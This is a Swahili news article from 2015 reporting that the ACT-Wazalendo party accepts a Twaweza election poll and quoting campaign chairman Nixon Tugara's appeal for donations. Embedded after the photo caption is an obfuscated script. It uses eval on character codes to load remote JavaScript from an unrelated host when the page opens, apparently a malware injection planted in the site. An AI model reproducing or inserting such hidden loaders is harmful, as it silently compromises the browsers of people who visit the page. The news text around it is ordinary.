Recent Comments

ACT-Wazalendo waunga mkono utafiti Twaweza

By Baraka Bitariho Sep 23, 2015
<p>Mwenyekiti wa Kamati ya Uchaguzi na Kampeni Taifa wa ACT, Nixon Tugara (katikati) akizungumza na waandishi wa habari </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mwenyekiti wa Kamati ya Uchaguzi na Kampeni Taifa wa ACT, Nixon Tugara (katikati) akizungumza na waandishi wa habari
Mwenyekiti wa Kamati ya Uchaguzi na Kampeni Taifa wa ACT, Nixon Tugara (katikati) akizungumza na waandishi wa habari

CHAMA cha ACT-Wazalendo kimekubaliana na matokeo ya utafiti yaliyotangazwa jana na Taasisi ya Twaweza. Utafiti huo ulihusu maoni ya wananchi kuelekea Uchaguzi Mkuu wa Oktoba 25 mwaka huu. Anaandika Sarafina Lidwino … (endelea).

Katika matokeo hayo taasisi hiyo ilimtaja mgombea urais kupitia Chama Cha Mapinduzi (CCM), Dk. John Magufuli kuwa chaguo la Watanzania wengi kwa kupata asilimia 65.

Utafiti huo pia umeonesha kwamba, mgombea urais wa Chama cha Demokrasia na Maendeleo (Chadema) na anayeungwa mkonono na Umoja wa Katiba ya Wananchi (UKAWA), Edward Lowassa alipata kura 25.

Akizungumza na waandishi wa habari leo ofisini kwake, Mwenyekiti wa Kamati ya Uchaguzi na Kampeni Taifa wa ACT, Nixon Tugara ametaja changamoto hizo kuwa ni afya imetajwa kwa asilimia 59, Maji, asilimia 46 na elimu 44.

“Katika afya ACT Wazalendo tumeainisha waziwazi kwamba kutengeneza mfumo imara na endelevu wa upatikanaji wa maji hasa vijijini ni njia muhimu katuka kuimarisha afya za wananchi. Kwa maana hiyo hiyo utafiti huo umeonesha kuwa chama chetu na ilani yetu ilizingatia vya kutosha mahitahi ya jamii ya sasa na muda ujao katika nchi yetu,” amesema Tugara.

Tugara ameongeza kuwa, licha ya kuzingatia mahitaji ya wananchi lakini pia chama kinajivunia kupata asilimia zaidi ya moja kutajwa na wananchi katika utafiti huo na kwamba, “ACT inashika nafasi ya nne ukiacha CCM na vyama vitatu vinavyounda Ukawa.”

Amedai kuwa, ACT kinajivunia kuwa Twaweza imekiri kwamba wakati utafiti huo unafavyika chama hicho kilikuwa bado hakijazindua kampeni zake wale kumtangaza rais wao hivyo ilikuwa na nafasi ya kufanya vizuri zaidi katika utafiti huo.

“Kutokana na kufanya vizuri sana katika uzinduzi wetu na kampeni hizi zinazoendelea nchi nzima tunaamini kuwa endepo utafiti huu ungefanyika tena hata leo ACT tungefanya vizuri zaidi kwa kuwa chama chetu kinapedwa na watu wengi zaidi,” amesema Tugara.

Akizungumzia maendeleo ya chama hicho amesema, tangu walipozindua kampeni 30 Agosti mwaka huu, wagombea wengi wamekuwa wakitumia pesa zao binafsi kutokana na uhaba wa fedha ndani ya chama.

Tugara amesema, kwa sasa chama hicho kinakabiliwa na uhaba wa fedha za kuendeshea kampeni zake hivyo inapelekea kuchelewa kuwafikia wananchi katika baadhi ya maeneo.

“Tunatoa wito kwa Watanzania wote popote walipo kwa utashi wao waweze kuguswa na kuchangia kampeni zetu kwa kiasi chochote walichonacho. Tunaomba mchango ili tuendeleze mapambano ya kuijenga Tanzania kwenye misingi yake” amesema Tugara

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com